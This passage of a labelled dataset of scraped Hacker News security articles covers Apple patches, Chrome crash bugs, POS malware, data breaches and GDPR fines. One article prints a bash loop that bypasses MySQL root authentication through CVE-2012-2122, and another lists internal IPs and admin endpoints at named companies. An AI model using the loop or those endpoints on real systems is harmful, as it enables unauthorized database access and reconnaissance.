One of the key tools of the exploit takes advantage of a memory corruption bug in Safari WebKit, allowing hackers to deliver the malicious payload when a target victim clicks on a malicious link and initiate the process of overtaking the operating system.
In an advisory, Apple warned that visiting a ""maliciously crafted website"" via Safari browser could allow attackers to execute arbitrary code on a victim's computer.
The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto's Citizen Lab.
Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security, and Citizen Lab traced the three programming blunders and its Pegasus spyware kit to Israeli ""cyber war"" organization NSO Group, which sells hacking exploits to governments like the UAE.
Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms.
",Vulnerability
"Google, Paypal, Facebook Internal IP disclosure vulnerability",https://thehackernews.com/2012/12/google-paypal-facebook-internal-ip.html,"Do you have any idea about an Internal IP Address or a Private IP Address that too assigned for Multinational Companies? Yeah, today we are gonna discuss about Internal IP or Private IP address Disclosure.
Disclosure of an Internal IP like 192.168.*.* or 172.16.*.* , can really Impact ? Most security researchers call it as ""bull shit"" vulnerability. But when it comes to impact calculation even if the server is behind a firewall or NAT, an attacker can see internal IP of the remote host and this may be used to further attacks.
Internet Giants like Facebook, Google, PayPal and Serious National Security organizations like FBI, Pentagon and NASA are taking initiatives for their Security Issues. At same, we at 'The Hacker News' stand together for organizations that talk about national security in a serious way.
I guess,its the time to understand about the flaws and its impacts where I would like to share my findings about our Internet Giants and Organizations.
Facebook - Internal IPv4 Address and Session Cookie Disclosure
Facebook spent $8.5 million to buy fb.com. According to the many report available on the internet says ""fb.com is for Facebook Internal Use Only"".
URL - https://newsroom.fb.com/v/?id=467&skip=False
Internal IP : 192.168.149.88
Session Cookie : Session Cookie Generation probably depends the administration from their admin panel located at https://newsroom.fb.com/admin/login.aspx?RefUrl=%2fadmin%2fdefault.aspx
PayPal - [ www.paypal.com & www.where.com ]
Paypal is being the largest in the e-banking business has its Internal IPv4 Address and Other Server Detail Disclosure while accessing one of its sub domain.
URL - https://ad.paypal.com/jin/info.jsp
Internal IP Range - 192.168.*.*
URL - https://www.where.com/jin/info.jsp
URL - https://api.where.com/jin/info.jsp
Google - [ Server Path Disclosure]
Recently , I came across an issue reported by an user on Google Code website to Google Team members of modpagespeed project.. mod_pagespeed is an open-source Apache module created by Google to help Make the Web Faster by rewriting web pages to reduce latency and bandwidth.
If you closely analyze the URL mentioned in the forum post you might get some encoding error. But if you access the URL via Google Web-Cache ( Interesting Part: Using Google Service to Retrieve Information of Other Google Services )
Vulnerable Domain: dl.google.com
Vulnerability: Server Path Disclosure
Steps to Reproduce: Access Google Web-Cache URL: Click Here
Cron Job Info of Google Talk, Plugins and Google Chrome
Google Talk - Cron Job Info , Path Disclosed: Cache URL
/etc/cron.daily/google-chrome
/opt/google/chrome/PepperFlash/libpepflashplayer.so
/opt/google/chrome/chrome-sandbox
/opt/google/chrome/chrome.pak
/opt/google/chrome/chrome_100_percent.pak
/opt/google/chrome/default-app-block
Google Talk Plugin - Cron Job Info, Path Disclosed: Cache URL
google-talkplugin-3.10.2.0-1.src.rpm
/etc/cron.daily/google-talkplugin
Google Chrome- Cron Job Info, Path Disclosed: Cache URL
google-chrome-beta-24.0.1312.40-172509.src.rpm
/usr/bin/google-chrome/
etc/cron.daily/google-chrome
NASA
Internal IP, Subnet mask disclosure in a publicly available file at NASA ftp (now deleted) can be seen via Google cache.
Tata Consultancy Services
TCS was also having similar internal IP disclosure flaw, recently fixed. We have a screenshot of that
In the above screenshot we can easily find the Microsoft OLDE DB provider Information and the Server Internal (Private IP Address : 192.168.15.65).
This may disclose information about the IP addressing scheme of the internal network. This information can be used to conduct further attacks.
For a hacker Information is like a treasure and gathering each and every small information = Treasure hunting. Vulnerability either low or Critical, its still remains a vulnerability.
",Vulnerability
SQL Injection Vulnerability in 'Yahoo! Contributors Network',https://thehackernews.com/2014/10/sql-injection-vulnerability-in-yahoo.html,"Yahoo! Contributors Network (contributor.yahoo.com), the network of authors that generated the contents such as photographs, videos, articles and their knowledge to more than 600 million monthly visitors, was vulnerable to a Time based Blind SQL Injection vulnerability.
Behrouz Sadeghipour, a security researcher reported the Blind SQLi vulnerability in Yahoo!'s website that could be exploited by hackers to steal users' and authors' database, containing their personal information.
Behrouz reported this flaw to Yahoo! Security team few months back. The team responded positively and within a month they patched the vulnerability successfully. Unfortunately after that Yahoo! announced to shut down 'Yahoo Contributors Network' due to its decreasing popularity and removed all the contents from the web, except some of the ""work for hire"" content may remain on the web.
The critical vulnerability was able to expose the database which carried sensitive and personal information of those authors who was participating and getting paid from their work. While looking around the website, the researcher came across two vulnerabilities in the following URL/files:
https://contributor.yahoo.com/forum/search/?
https://contributor.yahoo.com//library/payments/data-table/?
The vulnerability allows remote attackers to inject own SQL commands to breach the database of the above vulnerable URLs and get access to the users' personal data.
In 2012, Yahoo! Contributors Network was hacked by a group of hackers called ""D33DS Company"" and ""Owned and Exposed"" data breach exposed stolen 453,491 email addresses and passwords online. Reportedly, at that time hackers used the same technique i.e. SQL Injection attack to carry out the data breach.
SQL INJECTION AND ITS IMPACTS
SQL Injection (SQLi) attacks have been around for over a decade. It involves inserting a malformed SQL query into an application via client-side input. SQLi vulnerabilities are ranked as Critical one because if it is used by Hackers, it will cause a database breach which will lead to confidential information leakage.
In fact, according to Veracode's 2014 State of Security Software Report , SQL injection vulnerabilities still plague 32% of all web applications.
""We are currently seeing more than 50,000 attacks per day that fall into our SQL Injection categorization. Most of them are automated and try to compromise well known vulnerabilities in common CMS's and web projects (Joomla, WordPress, vBulletin, etc),"" the security researcher, David Dede, of the security firm Sucuri wrote in a blog post.
SQL INJECTION CONTINUE TO GROW
The analysis carried out by the security firms shows that the number of SQL injection attempts continue to grow as the time passes on.
""If we drill down into our data and hook it up to a geo locator we can also see that the attacks come from everywhere. Most people tend to think that Russia, Brazil, Romania and a few other countries are the ""bad"" sources, but for SQL injection, the top attackers come from the USA, India, Indonesia and China,"" the researcher added.
SQL Injections are a real threat and are being actively attacked and exploited by hackers every day. ""If you are a developer you should be leveraging the OWASP SQL Injection Prevention Cheat Sheet at a minimum.""
",Data_Breaches
Hackers Spotted Using Morse Code in Phishing Attacks to Evade Detection,https://thehackernews.com/2021/08/hackers-spotted-using-morse-code-in.html,"Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials.
The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file (""XLS.HTML""). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts.
Microsoft likened the attachment to a ""jigsaw puzzle,"" noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation.
""This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving,"" Microsoft 365 Defender Threat Intelligence Team said in an analysis. ""The HTML attachment is divided into several segments, including the JavaScript files used to steal passwords, which are then encoded using various mechanisms. These attackers moved from using plaintext HTML code to employing multiple encoding techniques, including old and unusual encryption methods like Morse code, to hide these attack segments
Opening the attachment launches a browser window that displays a fake Microsoft Office 365 credentials dialog box on top of a blurred Excel document. The dialog box shows a message urging the recipients to sign in again due to reasons that their access to the Excel document has purportedly timed out. In the event the user enters the password, the individual is alerted that the typed password is incorrect, while the malware stealthily harvests the information in the background.
The campaign is said to have undergone 10 iterations since its discovery in July 2020, with the adversary periodically switching up its encoding methods to mask the malicious nature of the HTML attachment and the different attack segments contained within the file.
Microsoft said it detected the use of Morse code in the attacks' February and May 2021 waves, while later variants of the phishing kit were found to direct the victims to a legitimate Office 365 page instead of showing a fake error message once the passwords were entered.
""Email-based attacks continue to make novel attempts to bypass email security solutions,"" the researchers said. ""In the case of this phishing campaign, these attempts include using multilayer obfuscation and encryption mechanisms for known existing file types, such as JavaScript. Multilayer obfuscation in HTML can likewise evade browser security solutions.
",Cyber_Attack
AwSnap! New Hack Can Crash Chrome Browsers of Mass Audience,https://thehackernews.com/2015/04/awsnap-chrome-crash.html,"Few weeks back, we reported how a string of just 13 characters could cause your tab in Chrome to crash instantly. However, there was an exception that this special 13 characters string was only working on Mac OS X computers with no impact on Windows, Android, or iOS operating systems.
Now, a recent hack against Chrome browser could crash your Chrome version 41 and above for Mac OS X, Windows and Chrome OS.
At the time of writing, Chrome 41 seems to crash on long and/or malformed URLs. The details of this crash bug, dubbed as AwSnap, is described on Github.
Warning: DO NOT CLICK on this LINK, which actually points to a Reddit thread that crashes Chrome browser because a Reddit user-submitted post containing the crash content. Just like a post, crashing a thread via a comment is also possible.
Chrome crash occurs only when accessing the long and/or malformed URLs through a web server, which means using file:// will not crash your Chrome browser.
Examples of long and/or malformed URLs that cause the Chrome browser to crash:
The crash issue appears to be small but is really serious, as it is possible for anyone to post the malformed URLs on a discussion forum, such as Reddit, and make the thread unavailable to all users. So, we recommend our users to do not post or drop the malformed URLs in comments or on your Facebook timeline.
At the time of writing, the AwSnap bug has been confirmed in Chrome 41 and patched in Chrome 42, & 43 running on MacOS, Windows and Chrome OS. However, there are mixed reports on Ubuntu.
",Vulnerability
3 New Code Execution Flaws Discovered in Atlantis Word Processor,https://thehackernews.com/2018/11/word-processor-vulnerability.html,"This is why you should always think twice before opening innocent looking email attachments, especially word and pdf files.
Cybersecurity researchers at Cisco Talos have once again discovered multiple critical security vulnerabilities in the Atlantis Word Processor that allow remote attackers to execute arbitrary code and take over affected computers.
An alternative to Microsoft Word, Atlantis Word Processor is a fast-loading word processor application that allows users to create, read and edit word documents effortlessly. It can also be used to convert TXT, RTF, ODT, DOC, WRI, or DOCX documents to ePub.
Just 50 days after disclosing 8 code execution vulnerabilities in previous versions of Atlantis Word Processor, Talos team today revealed details and proof-of-concept exploits for 3 more remote code execution vulnerabilities in the application.
All the three vulnerabilities, listed below, allow attackers to corrupt the application's memory and execute arbitrary code under the context of the application.
Incorrect Calculation of Buffer Size (CVE-2018-4038) — an exploitable arbitrary write vulnerability resides in the open document format parser of Atlantis Word Processor while trying to null-terminate a string.
Improper Validation of Array Index (CVE-2018-4039) — an out-of-bounds write vulnerability exists in the PNG implementation of.
Use of Uninitialized Variable (CVE-2018-4040) — an exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor.
All these vulnerabilities affect Atlantis Word Processor versions 3.2.7.1, 3.2.7.2 and can be exploited by convincing a victim into opening a specially crafted malicious booby-trapped document.
Talos researchers responsibly reported all the vulnerabilities to the developers of the affected software, who have now released an updated version 3.2.10.1 that addresses the issues.
If you haven't yet, you are highly advised to update your word processing software to the latest version and security enthusiasts who are interested in learning more about these issues can head on to Talos blog for technical details.
The easiest way to prevent yourself from being a victim of attacks leveraging such vulnerabilities is never to open any document provided in an email from unknown or untrusted sources.
",Malware
Tor-enabled Point-of-Sale malware 'ChewBacca' stole Credit Card data from 11 Countries,https://thehackernews.com/2014/01/tor-enabled-point-of-sale-malware.html,"After the massive data breaches at U.S retailers Target and Neiman Marcus in which financial credentials of more than 110 million and 1.1 million customers were compromised respectively, shows that the Point of Sale (POS) system has become a new target for the cyber criminals.
Despite the BlackPOS malware of Point of Sale (POS) system that comes out as the major cause of these data breaches, malware writers are upgrading and developing more Trojans to target POS system.
In December, the security researchers at anti-virus firm Kaspersky Lab discovered a Tor-based banking trojan, dubbed ""ChewBacca""_x0081_, that was initially categorized as a Financial trojan, but recently security researchers at RSA have uncovered that 'ChewBacca' is also capable of stealing credit card details from point of sale systems.
'ChewBacca', a relatively new and private Trojan, used in the 11 countries as a POS malware is behind the electronic theft. ChewBacca communicates with its C&C (Command and Control) server over the Tor network obscuring the IP addresses of parties.
ChewBacca steals data from the POS system in two ways:
Generic keylogger that captures all the keystrokes.
Memory scanner that reads process memory and dumps the credit card details.
The botnet has been collecting track 1 and track 2 data of payment card since October 25, according to RSA.
During installation, ChewBacca creates a copy of itself as a file named ""spoolsv.exe""and place it in the windows Start > Startup folder, so that it can automatically start-up at the login time.
After installation, the keylogger program creates a log file called ""system.log"" inside the system %temp% folder that contains the keystroke events along with the window focus changes.
""The ChewBacca Trojan appears to be a simple piece of malware that, despite its lack of sophistication and defense mechanisms, succeeded in stealing payment card information from several dozen retailers around the world in a little more than two months.""
Neither the RSA nor the Kaspersky descriptions explain how the ChewBacca bot is propagated, but the RSA investigation has observed it mostly in the US and also detected in 10 other countries, including Russia, Canada and Australia.
The RSA has provided the data to the FBI on the ChewBacca operation, including the location of a command-and-control server used by the hackers.
They advised retailers to increase staffing levels and develop leading-edge capabilities to detect and stop attackers (comprehensive monitoring and incident response), encrypt or tokenize data at the point of capture and ensure that it is not in plain text view on their networks, thereby shifting the risk and burden of protection to the card issuers and their payment processors.
",Malware
Dutch Police arrested TorRAT Malware Gang for stealing over Million Dollar,https://thehackernews.com/2013/10/dutch-police-arrested-torrat-malware.html,"The TorRAT malware was first appeared in 2012 as spying tool only. But from August 2012, Bitcoin Mining feature was added and it became a powerful hacking tool that was commonly associated with attacks on Financial institutions.
ab
This year TorRat Malware targeted two out of three major Banks in the Netherlands and the criminals stole over Million Dollars from user' Banking Accounts.
The Dutch police has arrested four men from Alkmaar, Haarlem, Woubrugge and Roden on last Monday, who are suspected of involvement in the large scale digital fraud and money laundering case using TorRat Malware.
Using Spear Phishing techniques, gang targeted the victims to access their computers and the Financial accounts. The gang used anonymous VPN services, Bitcoins, TorMail and the Tor network itself to remain anonymous.
Malware is also capable of manipulating the information during online banking, can secretly add new payment orders and also able to modify existing orders.
To defend the detection from Antivirus softwares, TorRat uses the ZeuS malware in its attack. The technique was used to divert the focus of researchers to remove ZeuS infection, rather than the unknown malware on the system.
Some of the stolen money was converted by criminals to (56 BTC worth around 7700 Euros) Bitcoin virtual currency, which are now seized by Dutch police. Police also mentioned that, one of arrested criminal having his own Bitcoin exchange service.
The TorRAT malware has been known to be distributed in multiple ways. In April, TorRat was in news for hijacking twitter accounts. After infecting a vulnerable computers, the TorRAT malware hijacks the Twitter user's account and share links that lead to attack websites that attempt to inject TorRAT malware into the victim's computer.
The main reason why this particular attack is so effective is because victims are essentially receiving links to the TorRAT malware from sources they trust; accounts that they follow on Twitter. TorRAT malware involves using Man-in-the-Browser (MitB) tactics to infect computers through vulnerabilities in their Web browser. These kinds of attacks were used to take over a victim's online banking account.
They made more than 150 fraudulent transactions for victim's accounts and Police said that, because Gang was operating from the Netherlands, so tracking them become possible.
",Malware
Apple Releases dozens of Security Updates to Fix OS X and iOS Flaws,https://thehackernews.com/2015/07/apple-security-updates.html,"Apple has released updates to patch dozens of security vulnerabilities in iOS and OS X Yosemite operating system.
The updates include iOS 8.4 version of the mobile operating system, OS X Yosemite 10.10.4 and Security Update 2015-005.
iOS 8.4 Update
The iOS 8.4 update includes patches for over 20 security vulnerabilities that could lead to remote code execution (RCE), application termination, the intercepted encrypted traffic, man-in-the-middle attacks and other problem.
Certificate trust policy issues, buffer overflow vulnerabilities, apache compatibility issues, memory corruption flaws, and a host of WebKit, kernel, and CoreText vulnerabilities were also patched in the latest iOS update.
OS X Yosemite 10.10.4 update
The OS X Yosemite 10.10.4 update includes patches for QuickTime, ImageIO, and OpenSSL along with Remote Code Execution (RCE) flaws and other issues that may allow attackers to gain elevated privileges or crash applications.
The Safari 8.0.7 update patches four vulnerabilities in the WebKit browser engine that could allow an attacker to remotely execute code, view WebSQL databases, steal account information and pilfer cookie information from a targeted Mac.
Logjam Issue Resolved
The iPad and iPhone update also addresses the Logjam flaw, a cryptographic weakness in algorithms used by the ""Diffie-Hellman key exchange"" that allows protocols like HTTPS, SSH, SMTPS, IPsec to negotiate a secret key and create secure communication channels.
Mac owners are recommended to grab the OS X Yosemite version 10.10.4 and the latest Security Update 2015-005 now. It advisory details the same patches for many issues present in iOS as well as many additional vulnerabilities.
Update Now
Mac OS X users can download and install the updates through the Software Update tool. iPhone and iPad users can grab the update through the ""General"" tab in the Settings app and then click the Software Update tab to continue.
",Vulnerability
Marriott Faces $123 Million GDPR Fine Over Starwood Data Breach,https://thehackernews.com/2019/07/marriott-data-breach-gdpr.html,"After fining British Airways with a record fine of £183 million earlier this week, the UK's data privacy regulator is now planning to slap world's biggest hotel chain Marriott International with a £99 million ($123 million) fine under GDPR over 2014 data breach.
This is the second major penalty notice in the last two days that hit companies for failing to protect its customers' personal and financial information compromised and implement adequate security measures.
In November 2018, Marriott discovered that unknown hackers compromised their guest reservation database through its Starwood hotels subsidiary and walked away with personal details of approximately 339 million guests.
The compromised database leaked guests' names, mailing addresses, phone numbers, email addresses, dates of birth, gender, arrival and departure information, reservation date, and communication preferences.
The breach, which likely happened in 2014, also exposed unencrypted passport numbers for at least 5 million users and credit card records of eight million customers.
According to the Information Commissioner's Office (ICO), nearly 30 million residents of 31 countries in the European and 7 million UK residents were impacted by the Marriott data breach.
The ICO's investigation found that Marriott failed to undertake sufficient due diligence when it bought Starwood and should also have done more to secure its systems.
Last year, the General Data Protection Regulation (GDPR) was introduced in Europe that forces companies to make sure the way they collect, process, and store data are safe.
""The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected,"" Information Commissioner Elizabeth Denham said.
""Personal data has real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn't happen, we will not hesitate to take strong action when necessary to protect the rights of the public.""
Marriott International's president Arne Sorenson said the company was ""disappointed"" with the ICO's announcement and would contest the fine.
",Cyber_Attack
CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability,https://thehackernews.com/2012/06/cve-2012-2122-serious-mysql.html,"CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability
A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.
""When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might'vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256.""
""Which means, if one knows a user name to connect (and ""root"" almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, there's no need for a special libmysqlclient library.""
The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
Defense: The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.
the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the ""bind-address"" parameter to ""127.0.0.1"". Restart the MySQL service to apply this setting.
Note: Download The Latest Exploits for CVE-2012-2122 From our TOOLS YARD section.
",Vulnerability
Facebook Finds 'No Evidence' Hackers Accessed Connected Third-Party Apps,https://thehackernews.com/2018/10/facebook-token-hacking.html,"When Facebook last weekend disclosed a massive data breach—that compromised access tokens for more than 50 million accounts—many feared that the stolen tokens could have been used to access other third-party services, including Instagram and Tinder, through Facebook login.
Good news is that Facebook found no evidence ""so far"" that proves such claims.
In a blog post published Tuesday, Facebook security VP Guy Rosen revealed that investigators ""found no evidence"" of hackers accessing third-party apps with its ""Login with Facebook"" feature.
""We have now analyzed our logs for all third-party apps installed or logged in during the attack we discovered last week. That investigation has so far found no evidence that the attackers accessed any apps using Facebook Login,"" Rosen says.
This does not mean that the stolen access tokens that had already been revoked by Facebook do not pose any threat to thousands of third-party services using Facebook Login, as the company explains it depends upon how websites validate their users access tokens.
Many websites that do not use Facebook's official SDKs to regularly validate their users access tokens could still allow attackers to access users' accounts using revoked access tokens.
In order to help such websites, Facebook is building a tool that will enable developers to ""manually identify the users of their apps who may have been affected, so that they can log them out.""
""Any developer using our official Facebook SDKs — and all those that have regularly checked the validity of their users' access tokens – were automatically protected when we reset people's access tokens,"" Rosen says.
While announcing its worst-ever data breach last week, Facebook said unknown hackers had exploited a chain of vulnerabilities in its code to steal 50 million accounts tokens—digital keys that keep users logged in, so they don't need to re-enter their credentials every time they use the app.
The social media giant fixed the issue on Thursday night and forcefully logged 90 million users out of their accounts as a precaution by resetting their access tokens.
Even after Facebook announced that it found no evidence of hackers accessing third-party services that use Facebook's single sign-on in the massive attack, some of those services are taking necessary steps to safeguard their users.
For example, Uber has precautionarily expired all active Facebook-based login sessions temporarily after the data breach, while the company is still investigating the breach at its end.
The social media giant has yet to disclose the attackers responsible for the massive attack, their origins, and the data they may have stolen from the affected 50 million Facebook users.
The Irish Data Protection Commission said that less than 10 percent of the 50 million users (which equals to five million users) attacked in the breach are based in the European Union (EU), where Facebook can be fined up to $1.63 billion under the nation's General Data Protection Regulation (GDPR) if it did not find doing enough to protect the security of users.
",Cyber_Attack
BlackBerry Enterprise Server vulnerable to malicious image file,https://thehackernews.com/2011/08/blackberry-enterprise-server-vulnerable.html,"BlackBerry Enterprise Server vulnerable to malicious image file
There are remotely and easily exploitable vulnerabilities in the BlackBerry Enterprise Server that could allow an attacker to gain access to the server by simply sending a malicious image file to a user's BlackBerry device.
The vulnerabilities are in several version of BES for Exchange, Lotus Domino and Novell GroupWise, and Research in Motion said that an attacker who is able to exploit one of the bugs might also be able to move from the compromised BES server to other parts of the network. The company has issued a patch for the BES flaws and says that they are at the top of the severity scale in terms of exploitability.
The vulnerability in both the BlackBerry MDS Connection Service and the BlackBerry Messaging Agent is related to the way that the components handle PNG and TIFF image files. Exploiting the vulnerabilities can be as easy as sending a malicious PNG or TIFF file to a BlackBerry user. In some scenarios, the user wouldn't even need to open the email or click on a link in order to complete the attack.
""Successful exploitation of any of these vulnerabilities might allow an attacker to gain access to and execute code on the BlackBerry Enterprise Server. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network,"" RIM said in its advisory.
[Source]
",Vulnerability
540 Million Facebook User Records Found On Unprotected Amazon Servers,https://thehackernews.com/2019/04/facebook-app-database.html,"It's been a bad week for Facebook users.
First, the social media company was caught asking some of its new users to share passwords for their registered email accounts and now…
...the bad week gets worse with a new privacy breach.
More than half a billion records of millions of Facebook users have been found exposed on unprotected Amazon cloud servers.
The exposed datasets do not directly come from Facebook; instead, they were collected and unsecurely stored online by third-party Facebook app developers.
Researchers at the cybersecurity firm UpGuard today revealed that they discovered two datasets—one from a Mexican media company called Cultura Colectiva and another from a Facebook-integrated app called ""At the pool""—both left publicly accessible on the Internet.
More than 146 GB of data collected by Cultura Colectiva contains over 540 million Facebook user records, including comments, likes, reactions, account names, Facebook user IDs, and more.
The second dataset belonging to ""At the Pool"" app contains information about users' friends, likes, groups, and checked-in locations, as well as ""names, plaintext passwords and email addresses for 22,000 people.""
Though UpGuard believes the plaintext passwords found in the database were for the At the Pool app, and not for users' Facebook accounts, given the fact that people frequently re-use the same passwords for multiple apps, many of the leaked passwords could be used to access Facebook accounts.
""As Facebook faces scrutiny over its data stewardship practices, they have made efforts to reduce third-party access. But as these exposures show, the data genie cannot be put back in the bottle. Data about Facebook users have been spread far beyond the bounds of what Facebook can control today,"" experts at UpGuard said.
Both datasets were stored in unsecured Amazon S3 buckets, which have now been secured and taken offline after Upguard, Facebook and media contacted Amazon.
This is not the first time third-party companies have collected or misused Facebook data and sometimes leaked it to the public.
The most famous incident is the Cambridge Analytica scandal wherein the political data firm improperly gathered and misused data on 87 million users through a seemingly innocuous quiz app, for which the social media giant is facing £500,000 EU fine.
Though Facebook has since then tightened up its privacy controls ensuring apps use their access appropriately, the social media company is still facing intense pressure and criticism for not doing enough to offer better privacy and security to its 2.3 billion users.
",Data_Breaches
Firefox 17 Beta Released with Click-to-Play Plugins for blocking vulnerable Plugins,https://thehackernews.com/2012/10/firefox-17-beta-released-with-click-to.html,"Last week, Mozilla announced it will prompt Firefox users on Windows with old versions of Adobe Reader, Adobe Flash, and Microsoft Silverlight, but refused to detail how the system will work. Finally today Firefox 17 is now in beta and with it is a very cool feature, click-to-play plugins.
When a user lands on a site that requires the use of a plugin, say Adobe Flash, if the version running in the user's browser is on the list of known vulnerable applications, Mozilla will disable it and show the user a message saying that she needs to update the plugin.
""By combining the safety of the blocklist with the flexibility of click-to-play, we now have an even more effective method of dealing with vulnerable or out-of-date plugins."" Mozilla wrote on blog. Mozilla is still working on implementing the controls, which would allow you to block all plugins by default and then pick where you want them to run.
As already mentioned, this feature will be enabled by default in Firefox 17. There is, however, an about:config preference ""plugins.click_to_play"" that can be set to true to enable click-to-play for all plugins, not just out-of-date ones. Mozilla says it is still developing this part.
The main motivation behind this plugin is to prevent users' systems against drive-by attacks that target vulnerable plugins.
Subscribe to our Daily News-letter via email - Be First to know about Security and Hackers.
",Vulnerability
FBI Suggests Ransomware Victims — 'Just Pay the Ransom Money',https://thehackernews.com/2015/10/fbi-ransomware-malware.html,"Your Headache is not my Problem.
If your computer gets hacked and infected with malware that holds your data for ransom, just pay off the criminals to see your valuable data again and do not expect the FBI to save them – it's what the FBI is advising concerning ransomware.
Ransomware is a sophisticated malicious software that lets hacker encrypts all the contents of a victim's hard drive or/and server and demands ransom (typically in Bitcoins) for the decrypt key.
Also Read: Free Ransomware Decryption and Malware Removal ToolKit
Federal agencies and the FBI have long urged people not to pay ransom to the criminals, as there is no guarantee that they will even receive an unlock key.
The FBI – 'Better Pay up the Ransom'
However, while speaking at the 2015 Cyber Security Summit on Wednesday, Assistant Special Agent Joseph Bonavolonta, who oversees the FBI's Boston office, advised the companies infected with ransomware to better pay up the ransom, according to a recent report by Security Ledger.
""The ransomware is that good,"" said Bonavolonta. ""To be honest, we often advise people just to pay the ransom.""
So, is the FBI now sure that Paying Ransom would save the victim's data?
Malicious programs such as Cryptolocker, Cryptowall, and Reveton uses ""ultra secure"" encryption algorithms to encrypt victims' data, and the key to decrypt data can cost victims from $200 to $10,000.
However, even after paying this much of amount, there is no guarantee that victims will receive the key to recovering their data.
Even the police are not immune to Ransomware attacks. Cryptowall – currently the most widespread malware used – alone made criminal hackers over 18 Million in dollars from April 2014 to June 2015.
Due to the success of ransomware on such a vast scale, Bonavolonta said hackers are likely to keep their ransom demands low in an attempt to maximize profit. For this reason, they are mostly honest, he said, adding, ""You do get your access back.""
Also Read: Anyone can Now Create their Own Ransomware using This Hacking ToolKit
This advice from the FBI agent counters many public advisories on the ransomware. Also, not everyone would agree with what Bonavolonta advised because fulfilling demands of bad guys is equivalent to encouraging their bad practices.
Prevention is the Best Practice
As I previously recommended, the best defense measure against Ransomware is creating awareness within the organizations, as well as maintaining backups that are rotated regularly.
Most viruses are introduced by opening infected attachments or clicking on links to malware usually contained in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources.
Also Read: Ransomware Attacks Threaten Wearable Devices and Internet of Things
Moreover, ensure that your systems are running the latest version of Antivirus software with up to date malware definitions.
",Malware
THN Weekly Roundup — 15 Most Popular Cyber Security and Hacking News Stories,https://thehackernews.com/2015/09/hackernews-popular-updates.html,"We are once again here with our weekly round up based on last week's top cyber security threats and challenges.
I recommend you to read the entire thing (just click 'Read More' because there's some valuable advice in there as well).
Here's the list:
1. Reminder! If You have not yet, Turn Off Windows 10 Keylogger Now
Microsoft is very powerful in tracking every single word you type or say to its digital assistant Cortana using its newest Windows 10 operating system.
The keylogger that Microsoft put in the Technical Preview of Windows 10 last fall made its way to Windows 10 Free public release first rolled out back in July.
Besides various Windows 10 privacy issues, there is a software component that is a bit more complicated than you thought. It tracks your inputs using:
Keyboard
Voice
Screen
Mouse
Stylus
Information about your Calendar and Contacts
If this keylogger, which is more than just a keylogger, makes you feel creepy then need not to worry, because the good news is — You can Turn Off this Keylogger.
For detailed information and to know how You can Turn Off this Keylogger – Read more.
2. 200 Million WhatsApp Users Vulnerable to vCard Vulnerability
A dangerous security vulnerability discovered in Whatsapp last week affected 200 Million WhatsApp Web users.
The web-based extension of WhatsApp was found vulnerable to a vCard exploit that could have allowed hackers to trick users into installing malware on their computers including:
Remote Access Tools (RATs)
Ransomware
Bots
Other malicious software
Here's How the WhatsApp Exploit Works – Read more.
3. 11 Million Ashley Madison Passwords Cracked In Just 10 Days
Last month, Ashley Madison hackers leaked about 100 GB of sensitive data belonging to the popular extramarital affair website 'Ashley Madison', which includes the source code of company's website, users' details, and hashed passwords.
However, the Password Cracking Team 'CynoSure Prime' has cracked more than 11 Million user passwords within ten days.
Moreover, a member of the team shared the same list of passwords online, and the calculations were terrible.
The top 5 most used passwords by Ashley Madison customers were:
123456
12345
password
DEFAULT
and 123456789.
For more in-depth information – Read more.
4. Microsoft is Auto-Downloading Windows 10 to PCs without your Knowledge, But Here's How to Stop
Microsoft is auto-downloading Windows 10 installation files — up to 6GB — onto users' PCs even if the users have not opted into the upgrade.
The company has dropped and saved a hidden $Windows.~BT folder on your computer's primary (C) drive, if you are running Windows 7 or Windows 8.1.
Doing so, Microsoft is not only consuming your device storage space but also stealing your Internet bandwidth for large unrequested files, i.e., up to 6 gigabytes.
Until the company provides some official fix to this issue, here are some methods that you can use to stop Microsoft from auto-downloading Windows 10 installation files onto your PCs.
5. Samsung Launches 6GB RAM Chips for Next-Generation Smartphones
